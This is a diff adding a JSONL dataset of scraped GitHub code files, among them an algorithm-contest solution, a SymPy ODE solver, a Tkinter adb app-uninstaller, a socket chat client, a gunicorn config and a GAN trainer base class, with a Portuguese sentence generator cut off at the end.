diff --git "a/4921.jsonl" "b/4921.jsonl" new file mode 100644--- /dev/null +++ "b/4921.jsonl" @@ -0,0 +1,516 @@ +{"seq_id":"74886100607","text":"# https://www.acmicpc.net/problem/16987\n# 계란으로 계란치기\n\nimport sys\n\nN = int(sys.stdin.readline().rstrip())\ndfs_stack = [[list(map(int, sys.stdin.readline().rstrip().split())) for _ in range(N)] + [0]] # 마지막 : 다음에 칠 계란위치\nmax_broken = 0\nwhile len(dfs_stack) > 0:\n tmp_elem = dfs_stack.pop()\n\n if tmp_elem[-1] == N:\n now_broken = 0\n for egg in range(N):\n if tmp_elem[egg][0] <= 0:\n now_broken += 1\n max_broken = max(max_broken, now_broken)\n if max_broken == N:\n break\n continue\n\n if tmp_elem[tmp_elem[-1]][0] < 0:\n new_list = [[tmp_elem[x][s] for s in range(2)] for x in range(N)] + [tmp_elem[-1]]\n new_list[-1] += 1\n dfs_stack.append(new_list)\n continue\n\n crushed = False\n for egg_idx in range(N):\n if tmp_elem[-1] != egg_idx and tmp_elem[egg_idx][0] > 0 and tmp_elem[tmp_elem[-1]][0] > 0:\n new_list = [[tmp_elem[x][s] for s in range(2)] for x in range(N)] + [tmp_elem[-1]]\n # new_list[egg_idx]와 new_list[tmp_elem[-1]]의 충돌\n new_list[egg_idx][0] -= new_list[new_list[-1]][1]\n new_list[new_list[-1]][0] -= new_list[egg_idx][1]\n new_list[-1] += 1\n dfs_stack.append(new_list)\n crushed = True\n\n if not crushed:\n new_list = [[tmp_elem[x][s] for s in range(2)] for x in range(N)] + [tmp_elem[-1]]\n new_list[-1] += 1\n dfs_stack.append(new_list)\n\nprint(max_broken)","repo_name":"Algo-Inha/Algo-inha","sub_path":"mang5o/220927/bj-16987.py","file_name":"bj-16987.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"42"} +{"seq_id":"12172417794","text":"import numpy as np\nfrom mdsimulator.neighbor_list import NeighborList\nfrom mdsimulator.neighbor_order_pbc import create_nb_order\nfrom mdsimulator.short_ranged import potentials\n\n# n number of particles\nn = 2\nppos = np.array([[1, 2],\n [2, 4]])\nbox = (10, 10)\nparams = 3\nsigma_c = 1\nr_cut = 10\n\nnl = NeighborList(box, ppos, r_cut)\nnbs = create_nb_order(box, r_cut)\n\ne = potentials(ppos, params, sigma_c, nl, nbs, r_cut, lj=True, couloumb=True)","repo_name":"Marsll/md-simulator","sub_path":"mdsimulator/obsolete_code/blueprint.py","file_name":"blueprint.py","file_ext":"py","file_size_in_byte":458,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"9212608142","text":"from operator import itemgetter\nn=input(\"Enter data: \")\nl=[]\nwhile True:\n i=input()\n if i:\n l.append(tuple(i.split(',')))\n else:\n break\nprint(sorted(l,key=itemgetter(0,1,2)))\n","repo_name":"renu0028/PythonScripts","sub_path":"Sort.py","file_name":"Sort.py","file_ext":"py","file_size_in_byte":177,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"70463746368","text":"import torch_npu\r\n\r\n__all__ = [\"Reducer\", \"_register_comm_hook\", \"_register_builtin_comm_hook\",\r\n \"_compute_bucket_assignment_by_size\", \"_verify_params_across_processes\", \"_broadcast_coalesced\"]\r\n\r\n\r\ndef is_available():\r\n \"\"\"\r\n Returns ``True`` if the distributed package is available. Otherwise,\r\n ``torch.distributed`` does not expose any other APIs. Currently,\r\n ``torch.distributed`` is available on Linux, MacOS and Windows. 
Set\r\n ``USE_DISTRIBUTED=1`` to enable it when building PyTorch from source.\r\n Currently, the default value is ``USE_DISTRIBUTED=1`` for Linux and Windows,\r\n ``USE_DISTRIBUTED=0`` for MacOS.\r\n \"\"\"\r\n return hasattr(torch_npu._C, \"_c10d_npu_init\")\r\n\r\n\r\nif is_available() and not torch_npu._C._c10d_npu_init():\r\n raise RuntimeError(\"Failed to initialize torch_npu.distributed\")\r\n\r\n\r\nfrom torch_npu._C._distributed_c10d import (\r\n Reducer,\r\n _register_comm_hook,\r\n _register_builtin_comm_hook,\r\n _compute_bucket_assignment_by_size,\r\n _verify_params_across_processes,\r\n _broadcast_coalesced\r\n)\r\n\r\n","repo_name":"Ascend/pytorch","sub_path":"torch_npu/distributed/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":84,"dataset":"github-code","pt":"42"} +{"seq_id":"31544302193","text":"from tkinter import Tk,Label,Listbox,ANCHOR ,Button ,messagebox,Scrollbar\nimport tkinter as tk\nimport adbutils\nfrom tkinter import *\n\ndef on_keyrelease(event):\n\n # get text from entry\n value = event.widget.get()\n value = value.strip().lower()\n\n # get data from list1\n if value == '':\n data = list1\n else:\n data = []\n for item in list1:\n if value in item.lower():\n data.append(item) \n\n # update data in listbox\n listbox1_update(data)\n\n\ndef listbox1_update(data):\n # delete previous data\n listbox1.delete(0, 'end')\n\n # sorting data\n data = sorted(data, key=str.lower)\n\n # put new data\n for item in data:\n listbox1.insert('end', item)\n\n\ndef on_select1():\n newitem=listbox1.get(listbox1.curselection())\n listbox2.insert(0,newitem)\n listbox1.delete(ANCHOR)\n list2.append(newitem)\n list1.remove(newitem)\n print(\"list2==\",list2)\n\ndef on_select2():\n newitem=listbox2.get(listbox2.curselection())\n listbox1.insert(0,newitem)\n listbox2.delete(ANCHOR)\n list1.append(newitem)\n list2.remove(newitem)\n print(\"list1==\",list1)\n\ndef on_select1xx(event):\n newitem=listbox1.get(listbox1.curselection())\n listbox2.insert(0,newitem)\n listbox1.delete(ANCHOR)\n list2.append(newitem)\n list1.remove(newitem)\n print(\"list2==\",list2)\n\ndef on_select2xx(event):\n newitem=listbox2.get(listbox2.curselection())\n listbox1.insert(0,newitem)\n listbox2.delete(ANCHOR)\n list1.append(newitem)\n list2.remove(newitem)\n print(\"list1==\",list1)\n\n \n\ndef on_uninstall():\n print(\"UNINSTALL IN PROGRESS...\")\n for package in list2:\n # pass\n # print(sp.getoutput('adb shell pm uninstall -k --user 0 {}'.format(package)))\n print(dev.shell('pm uninstall -k --user 0 {}'.format(package)))\n print(\"successfully uninstalled \",len(list2),\" items\")\n messagebox.showinfo(\"Title\", \"successfully uninstalled \"+str(len(list2))+\" items\")\n listbox2.delete(0,\"end\")\n list2.clear()\n\ndef on_clearall():\n list1.extend(list2)\n listbox1_update(list1)\n listbox2.delete(0,\"end\")\n list2.clear()\n\n\n\n# --- main ---\nadb = adbutils.AdbClient(host=\"127.0.0.1\", port=5037)\ndev = adb.device()\nout=dev.shell('pm list packages')\n# out = sp.getoutput('pyadb shell pm list packages')\noutput=out.replace('package:','').split('\\n')\n# list1 = ['apple', 'banana', 'Cranberry', 'dogwood', 'alpha', 'Acorn', 'Anise', 'Strawberry' ]\nlist1=output\nlist2=[]\nroot = tk.Tk()\nroot.title(\"AP's ANDROID SYSTEM APPS UNINSTALLER v1\")\n\nframe=Frame()\n\nl1= Label(frame, text=\"Search \",font=(\"\",20 ))\nentry = tk.Entry(frame,font=(\"\",20 ))\n\n\nentry.bind('', on_keyrelease)\nbtn1 = Button( text = \" 
> \",command=on_select1,font=(\"\",20 ))\nbtn2 = Button( text = \" < \",command=on_select2,font=(\"\",20 ))\nbtn3 = Button( text = \"UNINSTALL\",command=on_uninstall, fg='blue',font=(\"\",15,\"bold\" ))\nbtnclearall = Button( text = \"<<\",command=on_clearall,font=(\"\",20 ))\n\n\nroot.geometry(\"1366x768\")\n# l1.pack()\nframe.pack(pady=20,side=TOP)\nl1.pack(side=LEFT)\nentry.pack(side=LEFT)\nlistbox1 = tk.Listbox(root,width=30,height=20,font=(\"\",20 ))\nlistbox1.pack(side='left', ipadx=20, padx=30)\n# listbox1.place(x=200, y=200,height=800,width=300)\n\nlistbox2 = tk.Listbox(root,width=30,height=20,font=(\"\",20 ))\nlistbox2.pack(side='right', ipadx=20, padx=30)\nbtn1.pack(pady=60)\nbtn2.pack(pady=60)\nbtnclearall.pack(pady=60)\nbtn3.pack(pady=60)\n\n\n\n\nlistbox1.bind('', on_select1xx)\nlistbox2.bind('', on_select2xx)\n\n# listbox1.bind('<>', on_select)\nlistbox1_update(list1)\n\nroot.mainloop()","repo_name":"aswinpradeep/AP-s-Android-System-Apps-Uninstaller","sub_path":"AP_UNINSTALLER.py","file_name":"AP_UNINSTALLER.py","file_ext":"py","file_size_in_byte":3652,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"42"} +{"seq_id":"37809594645","text":"from socket import *\nimport utils.terminal as cmd\nimport colorama\n\nHOST = gethostname()\nPORT = 55551\nBUFFER_SIZE = 1024\n\n\ndef main():\n cmd.clear_screen()\n HOST = input(\"Digite o host que deseja conectar: \")\n PORT = int(input(\"Digite a porta que deseja conectar: \"))\n print('Tentando se conectar ao servidor...')\n print(f'HOST: {HOST},PORT:{PORT}')\n cmd.delay_loading(10)\n cmd.clear_screen()\n\n try:\n server = socket(AF_INET, SOCK_STREAM)\n server.connect((HOST, PORT))\n except:\n print(\n colorama.Fore.LIGHTRED_EX +\n '\\n- Não foi possível se conectar ao servidor. 
Ele está ativo?'\n )\n return cmd.clear_terminal_color()\n\n # Instruções para o cliente\n msg = server.recv(BUFFER_SIZE)\n while msg.decode() != 'start':\n print(msg.decode())\n msg = server.recv(BUFFER_SIZE)\n\n # Captura o nome do usuário\n print(\"\\n\")\n print(\"Digite seu nome de usuário:\")\n USER = input(\n colorama.Fore.LIGHTCYAN_EX + \" ▶ \" + colorama.Fore.RESET\n )\n server.send(f'name:{USER}'.encode())\n\n print('\\n')\n print(f\"No que você está pensando, {USER}?\")\n # Loop de interação com o servidor\n while msg.decode() != 'close':\n frase = input(\n colorama.Fore.LIGHTCYAN_EX +\n \" ▶ \" + colorama.Fore.RESET\n )\n server.send(f'{USER}:{frase}'.encode())\n\n msg = server.recv(BUFFER_SIZE)\n if msg.decode() != 'close':\n print(\n '{:>40}'.format(msg.decode()) +\n colorama.Fore.LIGHTMAGENTA_EX + ' ◀' + colorama.Fore.RESET\n )\n\n print('\\n')\n print(colorama.Fore.LIGHTRED_EX + f'- Conexão encerrada com o servidor')\n server.close()\n cmd.clear_terminal_color()\n input(\"Aperte para finalizar...\")\n\n\nmain()\n","repo_name":"igorroc/Socket","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1841,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"72734156928","text":"import os\nimport sys\nimport traceback\n\nimport newrelic.agent # See https://bit.ly/2xBVKBH\n\nnewrelic.agent.initialize() # noqa: E402\n\nworkers = 4\nworker_class = \"gevent\"\nworker_connections = 256\nbind = \"0.0.0.0:{}\".format(os.getenv(\"PORT\"))\naccesslog = \"-\"\n\non_aws = os.environ.get(\"NOTIFY_ENVIRONMENT\", \"\") in [\"production\", \"staging\", \"scratch\"]\nif on_aws:\n # To avoid load balancers reporting errors on shutdown instances, see AWS doc\n # > We also recommend that you configure the idle timeout of your application\n # > to be larger than the idle timeout configured for the load balancer.\n # > By default, Elastic Load Balancing sets the idle timeout value for your load balancer to 60 seconds.\n # https://docs.aws.amazon.com/elasticloadbalancing/latest/application/application-load-balancers.html#connection-idle-timeout\n keepalive = 75\n\n # The default graceful timeout period for Kubernetes is 30 seconds, so\n # want a lower graceful timeout value for gunicorn so that proper instance\n # shutdowns.\n #\n # Gunicorn config:\n # https://docs.gunicorn.org/en/stable/settings.html#graceful-timeout\n #\n # Kubernetes config:\n # https://kubernetes.io/docs/concepts/containers/container-lifecycle-hooks/\n graceful_timeout = 20\n\n\ndef on_starting(server):\n server.log.info(\"Starting Notifications API\")\n\n\ndef worker_abort(worker):\n worker.log.info(\"worker received ABORT {}\".format(worker.pid))\n for threadId, stack in sys._current_frames().items():\n worker.log.error(\"\".join(traceback.format_stack(stack)))\n\n\ndef on_exit(server):\n server.log.info(\"Stopping Notifications API\")\n\n\ndef worker_int(worker):\n worker.log.info(\"worker: received SIGINT {}\".format(worker.pid))\n","repo_name":"cds-snc/notification-api","sub_path":"gunicorn_config.py","file_name":"gunicorn_config.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":47,"dataset":"github-code","pt":"42"} +{"seq_id":"8249308264","text":"from sympy import * \nfrom sympy.abc import x \nfrom sympy.parsing import parse_expr \nfrom sympy.parsing.latex import parse_latex\n\nfrom solvers.sys_solvers.solve_linear import *\n\ndef solveReducibleToLinear(odeString, user_type): \n 
try:\n odeLeftString = odeString.split(\"=\")[0]\n odeRightString = odeString.split(\"=\")[1]\n\n odeLeftSym = parse_expr(odeLeftString)\n odeRightSym = parse_expr(odeRightString)\n\n y = Function('y')\n equation = Eq(odeLeftSym - odeRightSym, 0)\n\n solveArray = []\n\n left = equation.args[0]\n exp = solve(left, Derivative(y(x), x))\n aux = expand(exp[0])\n\n left = Derivative(y(x), x)\n\n functionF = parse_expr(\"0\")\n functionG = parse_expr(\"0\")\n\n n = Integer(0)\n\n aux = Mul(aux, Pow(y(x), Integer(-1)))\n aux = simplify(aux)\n\n for term in aux.args:\n if 'y' in str(term):\n for subTerm in term.args:\n if 'y' in str(subTerm):\n if type(subTerm) is Pow:\n n = Add(subTerm.args[1], Integer(1))\n subG = Mul(term, Pow(subTerm, Integer(-1)))\n functionG = Add(functionG, subG)\n else:\n n = 2\n subG = Mul(term, Pow(subTerm, Integer(-1)))\n functionG = Add(functionG, subG)\n else:\n functionF = Add(functionF, term)\n \n print(functionF)\n print(functionG)\n\n step = []\n step.append(\"- Identify the reducible to linear equation, its parts and degree\" + \"\\\\\\\\ \\\\\\\\\")\n subSteps = []\n h0 = \"From the equation its degree is given by: \" + str(n) + \"\\\\\\\\ \\\\\\\\\"\n subSteps.append(h0)\n\n h0 = \"Dividing the original equation by y raised to \" + str(n) + \": \\\\\\\\ \\\\\\\\\"\n subSteps.append(h0)\n\n newEquation = simplify(Mul(odeLeftSym, Pow(Function('y')(x), -1*n)))\n e0 = \"$\" + latex(newEquation) +\" = 0$\" + \"\\\\\\\\ \\\\\\\\\"\n subSteps.append(e0)\n\n functionF2 = Mul(functionF, Integer(Add(Integer(1), Mul(Integer(-1), n))))\n functionG2 = Mul(functionG, Integer(Add(Integer(1), Mul(Integer(-1), n))))\n print(functionF2)\n print(functionG2)\n\n u = Function('u')\n\n h1 = \"Finding the right substitution in the parameter u(x)\" + \"\\\\\\\\ \\\\\\\\ \"\n subSteps.append(h1)\n\n e1 = \"$\" + \"u(x) = y^{1-n}\" +\"$\" + \"\\\\\\\\ \\\\\\\\\"\n subSteps.append(e1)\n\n e2 = \"$\" + \"\\\\frac{1}{1-n}\\\\frac{du}{dx} = \\\\frac{dy}{dx}y^{-n}\" + \"$\" + \"\\\\\\\\ \\\\\\\\\"\n subSteps.append(e2)\n\n haux = \"Applying with n = \" + str(n)\n subSteps.append(haux)\n\n e3 = \"$\" + \"u(x) = y^{\" + str(1-n) + \"}$\" + \"\\\\\\\\ \\\\\\\\\"\n subSteps.append(e3)\n\n e4 = \"$\" + \"\\\\frac{1}{\" + str(1-n) + \"}\\\\frac{du}{dx} = \\\\frac{dy}{dx}y^{\" + str(-1*n) + \"}\" + \"$\" + \"\\\\\\\\ \\\\\\\\\"\n subSteps.append(e4)\n\n h2 = \"Substituting into the equation, yields \" + \"\\\\\\\\ \\\\\\\\ \"\n subSteps.append(h2)\n\n equation = Eq(Add(Derivative(u(x), x), Mul(functionF2, u(x))), -1*functionG2)\n\n h3 = \"$\" + latex(equation) + \"$\" + \"\\\\\\\\ \\\\\\\\ \"\n subSteps.append(h3)\n\n h4 = \"Which is linear\" + \"\\\\\\\\ \\\\\\\\ \"\n subSteps.append(h4)\n\n step.append(subSteps)\n solveArray.append(step)\n\n odeStringEqLeft = equation.args[0]\n odeStringEqRigth = equation.args[1]\n odeStringLinear = str(odeStringEqLeft) + \"=\" + str(odeStringEqRigth)\n\n solveFromLinear = solveLinear(odeStringLinear, 'u', user_type)\n solveArray += solveFromLinear[1]\n solveForU = solveFromLinear[2]\n print(solveForU)\n\n '''\n ------------------------------------------------------\n # Step 02: Get Explicit Solve\n ------------------------------------------------------\n '''\n solveArray.append([])\n step = solveArray[len(solveArray) - 1]\n step.append(\"- Undo the variable change\" + \"\\\\\\\\ \\\\\\\\\")\n step.append([])\n subSteps = step[1]\n \n global finalSolve\n finalSolve = []\n\n if (len(solveForU)) > 0:\n try:\n for singleSolveForU in solveForU:\n 
finalSolve.append(Pow(singleSolveForU, 1/(1-n))) \n\n for singleSolve in finalSolve:\n eq1s6 = Eq(y(x), singleSolve)\n subSteps.append(\"$\" + latex(eq1s6) + \"$\" + \"\\\\\\\\ \\\\\\\\\") \n\n # Analytic intervention for all the single solves if is teacher\n if (user_type == 'teacher'):\n print(\"Teacher\")\n try:\n roots = []\n roots_process = PropagatingThread(target = get_roots, args = [singleSolve, roots])\n roots_process.start()\n roots_process.join(timeout = 3)\n\n h0 = \"Whose roots are: \" + \"\\\\\\\\ \\\\\\\\\"\n subSteps.append(h0) \n subIndex = 1\n for root in roots:\n eq0 = \"$\" + \"x_{\" + str(subIndex) + \"} = \" + latex(root) + \"$\" + \"\\\\\\\\ \\\\\\\\\"\n subIndex = subIndex + 1\n subSteps.append(eq0)\n\n except Exception as e:\n print(\"Error with roots\")\n print(e)\n\n try:\n critics = []\n critics_process = PropagatingThread(target = max_min, args = [singleSolve, critics])\n critics_process.start()\n critics_process.join(timeout = 3)\n\n h0 = \"Whose critics are: \" + \"\\\\\\\\ \\\\\\\\\"\n subSteps.append(h0)\n subIndex = 1\n for critic in critics:\n eq0 = \"$\" + \"x_{\" + str(subIndex) + \"} = \" + latex(critic) + \"$\" + \"\\\\\\\\ \\\\\\\\\"\n subIndex = subIndex + 1\n subSteps.append(eq0)\n\n except Exception as e:\n print(\"Error with critics\")\n print(e)\n\n try:\n inflexions = []\n inflexions_process = PropagatingThread(target = inflexion_points, args = [singleSolve, inflexions])\n inflexions_process.start()\n inflexions_process.join(timeout = 3)\n\n h0 = \"Whose inflexions are: \" + \"\\\\\\\\ \\\\\\\\\"\n subSteps.append(h0)\n subIndex = 1\n for inflexion in inflexions:\n eq0 = \"$\" + \"x_{\" + str(subIndex) + \"} = \" + latex(inflexion) + \"$\" + \"\\\\\\\\ \\\\\\\\\"\n subIndex = subIndex + 1\n subSteps.append(eq0)\n\n except Exception as e:\n print(\"Error with inflexions\")\n print(e)\n\n if (user_type == \"teacher\"):\n '''\n ------------------------------------------------------\n # Step 07: Generate Plot\n ------------------------------------------------------\n '''\n solveArray.append([])\n step = solveArray[len(solveArray) - 1]\n step.append(\"- Graphs\" + \"\\\\\\\\ \\\\\\\\\")\n step.append([])\n subSteps = step[1]\n\n for singleSolve in finalSolve:\n # Add plot step to solution\n print(\"Creating plot\")\n\n try:\n plot_string = create_plot(singleSolve)[1:]\n plot_string = plot_string.replace(\"\\\\n\", \"\")\n except Exception as e:\n print(e)\n\n subSteps.append(plot_string)\n print(\"Plot appended\") \n \n except:\n subSteps.append(\"Can not get the explicit solution solving for y\" + \"\\\\\\\\ \\\\\\\\\")\n\n def display_step(step):\n stepStr = \"\"\n for subStep in step:\n stepStr += str(subStep)\n return stepStr\n\n def display_solve(solveArray):\n solveStr = \"\"\n for stepAux in solveArray:\n if len(stepAux) != 0:\n solveStr += stepAux[0]\n solveStr += display_step(stepAux[1])\n else:\n solveArray.remove(stepAux)\n return solveStr \n\n return [ display_solve(solveArray), solveArray ] \n \n except CompletenessAnomaly as ca:\n \n if ca.partial_solution[0][0] == \"partial integral\":\n step = solveArray[len(solveArray) - 1]\n subSteps = step[1]\n subSteps.append(\"-------------------------------\" + \"\\\\\\\\ \\\\\\\\\")\n\n for int_substep in ca.partial_solution[0][1]:\n subSteps.append(int_substep[\"text\"] + \"\\\\\\\\ \\\\\\\\\")\n subSteps.append(int_substep[\"symbol\"] + \"\\\\\\\\ \\\\\\\\\")\n subSteps.append(\"-------------------------------\" + \"\\\\\\\\ \\\\\\\\\")\n\n ca.set_partial_solution(solveArray)\n raise 
ca\n","repo_name":"buronsuave/pwa-ode-project-server","sub_path":"solvers/sys_solvers/solve_reducible_linear.py","file_name":"solve_reducible_linear.py","file_ext":"py","file_size_in_byte":8243,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"9279018828","text":"T = int(input())\nfor tc in range(1, T+1):\n N, M, K, H = map(int, input().split())\n land = [list(map(int, input().split())) for _ in range(N)]\n\n\n possible = 0\n for i in range(N - 2):\n for j in range(M - 2):\n space = [[0] * 3 for _ in range(3)]\n for k in range(3):\n for l in range(3):\n space[k][l] += land[i+k][j+l]\n\n min_num = space[0][0]\n max_num = space[0][0]\n for q in range(3):\n for w in range(3):\n if q != 1 or w != 1:\n if min_num > space[q][w]:\n min_num = space[q][w]\n if max_num < space[q][w]:\n max_num = space[q][w]\n\n\n if max_num - min_num <= K and min_num <= space[1][1] and space[1][1] - min_num <= H:\n possible += 1\n\n print('#{} {}'.format(tc, possible))","repo_name":"arinj9508/algorithm","sub_path":"2.7/우주선착륙.py","file_name":"우주선착륙.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"41777349899","text":"import os\nimport json\nimport pickle as pkl\n\nimport torch\nimport torchvision.transforms as Transforms\n\nfrom ...utils.config import BaseConfig, getConfigFromDict, getDictFromConfig\n\nclass BaseTrainer():\n \"\"\"\n a class to manage model training.\n \"\"\"\n\n def __init__(self,\n pathdb,\n dataloader=None,\n dbType=\"image\",\n targets=[\"\"],\n useGPU=True,\n config=None,\n lossIterEvaluation=1, # TODO: change back to 200\n saveIter=5000,\n checkPointDir=None,\n modelLabel=\"\"):\n \"\"\"\n Initializer for all trainers\n \"\"\"\n\n # Parameters\n # Training dataset parameters\n self.path_db = pathdb\n self.db_type = dbType\n self.targets = targets\n\n # set up dataloader for training\n self.dataloader = dataloader\n\n if config is None:\n config = {}\n\n # Load training configuration\n self.readTrainConfig(config)\n\n # Model Initialization\n self.useGPU = useGPU\n\n if not self.useGPU:\n self.numWorkers = 1\n\n # Internal state\n self.runningLoss = {}\n self.startScale = 0\n self.startIter = 0\n self.lossProfile = []\n\n self.initModel()\n\n # set checkpoint parameters\n self.checkPointDir = checkPointDir\n self.modelLabel = modelLabel\n self.saveIter = saveIter\n self.pathLossLog = None\n\n # Loss printing\n self.lossIterEvaluation = lossIterEvaluation\n\n def readTrainConfig(self, config):\n \"\"\"\n load a permanent configuration describing a model.\n variables described here should remain constant through the training.\n \"\"\"\n self.modelConfig = BaseConfig()\n getConfigFromDict(self.modelConfig, config, self.getDefaultConfig())\n\n def getDefaultConfig(self):\n \"\"\"the default config to load should be implemented here\"\"\"\n pass\n\n def initModel(self):\n \"\"\"the model should be initialized here\"\"\"\n pass\n\n def updateRunningLosses(self, allLosses):\n\n for name, value in allLosses.items():\n\n if name not in self.runningLoss:\n self.runningLoss[name] = [0, 0]\n\n self.runningLoss[name][0]+= value\n self.runningLoss[name][1]+=1\n\n def resetRunningLosses(self):\n\n self.runningLoss = {}\n\n def updateLossProfile(self, iter):\n\n nPrevIter = len(self.lossProfile[-1][\"iter\"])\n self.lossProfile[-1][\"iter\"].append(iter)\n\n newKeys = set(self.runningLoss.keys())\n existingKeys = 
set(self.lossProfile[-1].keys())\n\n toComplete = existingKeys - newKeys\n\n for item in newKeys:\n\n if item not in existingKeys:\n self.lossProfile[-1][item] = [None for x in range(nPrevIter)]\n\n value, stack = self.runningLoss[item]\n self.lossProfile[-1][item].append(value /float(stack))\n\n for item in toComplete:\n if item in [\"scale\", \"iter\"]:\n continue\n self.lossProfile[-1][item].append(None)\n\n def getDBLoader(self, scale):\n \"\"\"\n Load the training dataset for the given scale.\n\n Args:\n\n - scale (int): scale at which we are working\n\n Returns:\n\n A dataset with properly resized inputs.\n \"\"\"\n # prepare parameters for the dataloader\n # size\n size = self.model.getSize()\n\n print(\"size\", size)\n print(\"loading {} dataset\".format(self.db_type))\n\n dataset = self.dataloader.getDataset(self.path_db, self.targets, size, self.modelConfig)\n \n print(\"%d images detected\" % int(len(dataset)))\n \n return torch.utils.data.DataLoader(dataset,\n batch_size=self.modelConfig.miniBatchSize,\n shuffle=True, num_workers=self.model.n_devices)\n \n def inScaleUpdate(self, iter, scale, inputs_real):\n return inputs_real\n\n def trainOnEpoch(self,\n dbLoader,\n scale,\n shiftIter=0,\n maxIter=-1):\n pass\n\n def train(self):\n pass","repo_name":"ongyongzheng/generative_encoder","sub_path":"models/networks/base/base_trainer.py","file_name":"base_trainer.py","file_ext":"py","file_size_in_byte":4309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"6768170141","text":"import os\nfrom flask import Flask\n\napp = Flask(__name__)\n\n\ndef image_to_array(data):\n\n d = data['data']\n\n outputs = {}\n\n if 'url' in d:\n image = url_to_image(d['url'])\n\n try:\n if len(image.shape)==2:\n image = cv2.merge((image,image,image))\n except:\n print('image in 2d but cant convert ot 3d')\n\n try:\n trans_mask = image[:,:,3] == 0\n image[trans_mask] = [255, 255, 255, 255]\n image = cv2.cvtColor(image, cv2.COLOR_BGRA2BGR)\n except:\n ans = 0\n\n try:\n if image.shape[0] > 100 or image.shape[1] > 100:\n\n\n image = cv2.resize(image,(512,512),interpolation=cv2.INTER_CUBIC)\n\n image = image.astype('float32')/255.0\n\n image = np.expand_dims(image, axis=0)\n\n\n\n ans = np.argmax(model.predict(image))\n else:\n ans = 0\n except:\n ans = 0\n\n\ndef video_to_image(filen):\n\n try:\n hdr = {\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',\n 'Accept-Encoding': 'none',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'Connection': 'keep-alive'}\n\n f1 = './app/data/abc.png'\n req = urllib.request.Request(filen, headers=hdr)\n req = urllib.request.urlopen(req, timeout=5)\n\n f = open(f1, 'wb')\n f.write(req.read())\n f.close()\n\n image = cv2.imread('./app/data/abc.png', cv2.IMREAD_GRAYSCALE)\n image = cv2.resize(image,(224, 224))\n os.remove('./app/data/abc.png')\n except:\n image = None\n\n return image\n\n\n@app.route(\"/\")\ndef main(): \n video_to_image = None\n #video_to_image(received.JS.data)\n return \"\"\n\n@app.route('/api')\ndef hello():\n image_to_array = None\n #image_to_array(response.JS.stream)\n return \"\"\n\nif __name__ == \"__main__\":\n print(\"API pointed to hitAPI\")\n app.run(host=\"0.0.0.0\", 
port=8080)","repo_name":"rahul2240/gesture-det","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"42"} +{"seq_id":"13219075310","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 1 19:27:49 2020\n\n@author: allan\n\"\"\"\nwhile True:\n import random\n verbos = [\"comeu \",\"tomou \",\"pulou \",\"entrou n\",\"pintou \",\"estudou \",\"vendeu \",\n \"assistiu \",\"olhou \",\"desconfiou d\",\"deu em cima d\",\"mordeu \",\n \"lambeu \",\"chamou \",\"abriu \",\"estudou \",\"conheceu \",\"brincou com \",\n \"mexeu n\",\"recebeu \",\"achou \",\"acordou \",\"pegou \",\"bateu n\",\n \"apanhou d\",\"matou \",\"mandou \",\"desejou \",\"lavou \",\"mudou \",\n \"sonhou com \",\"pagou \",\"fechou \",\"permitiu \",\"sentou em cima d\",\n \"sentou em cima d\",\"sentou em cima d\",\"sentou em cima d\",\"sentou em cima d\",\n \"encheu \",\"ligou \",\"agradeceu \",\"convidou \",\"entregou \",\"beijou \",\n \"apresentou \",\"ensinou para \",\"perguntou sobre \",\"penteou \",\"escovou \",\n \"passou a mão n\",\"apagou \",\"amou \",\"viu \",\"escutou \",\"escreveu sobre \",\n \"andou em cima d\",\"dormiu em cima d\",\"vomitou em cima d\",\"pensou n\",\"jogou \",\"trabalhou \",\n \"subiu n\",\"construiu \",\"tirou \",\"gostou d\",\"prendeu \",\"roeu \",\n \"varreu \",\"limpou \",\"plantou \",\"regou \",\"acompanhou \",\"aumentou \",\n \"distraiu \",\"defendeu \",\"lutou com \",\"amassou \",\"quebrou \",\"cozinhou \",\n \"virou \",\"cobriu \",\"varreu \",\"maquiou \",\"escondeu \",\"trocou \",\n \"desenhou \",\"engoliu \",\"invadiu \",\"scaneou \",\"cheirou \",\"lambuzou \",\n \"cuspiu n\",\"encarou \",\"abaixou \",\"hidratou \",\"celebrou \",\n \"calculou \",\"xingou \",\"sugou \",\"apontou para \",\"tatuou \",\"navegou \",\n \"entupiu \",\"hackeou \",\"furou \",\"esculpiu \",\"fotografou \",\"chupou \",\n \"arrastou \",\"encaixou \",\"rodeou \",\"espantou \",\"imitou \",\"remou \",\n \"ressucitou \",\"estranhou \",\"curtiu\",\"gritou com \",\"espalhou \",\n \"buzinou para \",\"sorriu para \",\"babou n\",\"seduziu \",\"manchou \",\n \"enfiou \",\"cavalgou \",\"absorveu \",\"afundou \",\"alinhou \",\"dirigiu \",\n \"flagrou \",\"infectou \",\"arrotou \",\"enterrou \",\"encostou n\",\n \"deu banho n\",\"levou \",\"traficou \",\"desenterrou \",\"bombardeou \",\n \"fincou \",\"pediu para \",\"ateou fogo n\",\"defenestrou \",\n 